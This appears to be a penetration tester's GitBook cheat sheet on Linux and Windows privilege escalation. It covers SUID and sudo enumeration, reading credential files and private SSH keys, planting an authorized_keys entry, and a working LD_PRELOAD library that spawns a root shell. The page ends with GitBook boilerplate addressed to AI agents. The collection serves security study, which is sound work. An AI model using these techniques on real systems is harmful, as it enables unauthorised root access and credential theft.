> For the complete documentation index, see [llms.txt](https://docs.qu35t.pw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.qu35t.pw/privilege-escalation.md).

# Privilege Escalation

## Enumeration Scripts

* [LinEnum](https://github.com/rebootuser/LinEnum.git)
* [Linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)
* [Seatbelt](https://github.com/GhostPack/Seatbelt)
* [JAWS](https://github.com/411Hall/JAWS)
* [PEASS-ng](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

## Techniques

### Kernel Exploits

You can google known kernel exploits.

### Vulnerable Software

{% tabs %}
{% tab title="List packages (Linux)" %}

```bash
dpkg -l
```

{% endtab %}

{% tab title="List installed software (Windows)" %}

```powershell
dir C:\Program Files
```

{% endtab %}
{% endtabs %}

### User Privileges

{% tabs %}
{% tab title="Sudo" %}

```bash
sudo -l
```

{% endtab %}

{% tab title="SUID" %}

```bash
find / -perm /4000 2>/dev/null
```

{% endtab %}

{% tab title="SGID" %}

```bash
find / -perm /2000 2>/dev/null
```

{% endtab %}

{% tab title="SUID / SGID" %}

```bash
find / -perm /6000 2>/dev/null
```

{% endtab %}

{% tab title="Windows Token Privileges" %}

```powershell
whoami /priv
```

```powershell
whoami /all
```

{% endtab %}
{% endtabs %}

### Scheduled Tasks

{% tabs %}
{% tab title="Crontab directories" %}

```bash
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root
```

{% endtab %}

{% tab title="List crontab" %}

```bash
crontab -l
```

{% endtab %}

{% tab title="Edit a crontab" %}

```bash
crontab -e
```

{% endtab %}
{% endtabs %}

### Exposed Credentials

{% tabs %}
{% tab title="History" %}

<pre class="language-bash"><code class="lang-bash"><strong>cat ~/.bash_history
</strong></code></pre>

{% endtab %}

{% tab title="Configuration files" %}

```bash
cat /var/www/html/config.php
```

{% endtab %}
{% endtabs %}

### SSH Keys

{% tabs %}
{% tab title="Get private SSH Key" %}

```bash
cat /home/qu35t/.ssh/id_rsa
```

{% endtab %}

{% tab title="Generate SSH Key" %}

```bash
ssh-keygen -t ed25519 -f qu35t
```

{% endtab %}

{% tab title="Add an authorised key" %}

```bash
echo -n 'PUBLIC SSH KEY' > /home/qu35t/.ssh/authorized_keys
```

```bash
chmod 600 /home/qu35t/.ssh/authorized_keys
```

{% endtab %}

{% tab title="SSH with private SSH key" %}

```bash
ssh -i qu35t qu35t@10.10.10.10
```

{% endtab %}
{% endtabs %}

### LD\_PRELOAD

{% tabs %}
{% tab title="Program" %}

```bash
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
```

{% endtab %}

{% tab title="Compile" %}

```bash
gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.c
```

{% endtab %}

{% tab title="Load the library" %}

```bash
sudo LD_PRELOAD=/dev/shm/load.so /opt/script.sh
```

{% endtab %}
{% endtabs %}

## Windows

{% tabs %}
{% tab title="Unattended Windows Installations" %}

```powershell
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

{% endtab %}

{% tab title="Powershell History" %}

```powershell
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

{% endtab %}

{% tab title="Saved Windows Credentials" %}

```powershell
cmdkey /list
```

```powershell
runas /savecred /user:admin cmd.exe
```

{% endtab %}

{% tab title="IIS Configuration" %}

```powershell
C:\inetpub\wwwroot\web.config
```

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

{% endtab %}
{% endtabs %}

{% tabs %}
{% tab title="Scheduled Tasks" %}

```powershell
schtasks /query /tn vulntask /fo list /v
```

```powershell
icacls c:\tasks\schtask.bat
```

{% endtab %}

{% tab title="List Services" %}

```
HKLM\SYSTEM\CurrentControlSet\Services\
```

```powershell
sc qc apphostsvc
```

{% endtab %}
{% endtabs %}

## References

* [GTFOBins](https://gtfobins.github.io/)
* [LOLBAS](https://lolbas-project.github.io/#)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.qu35t.pw/privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.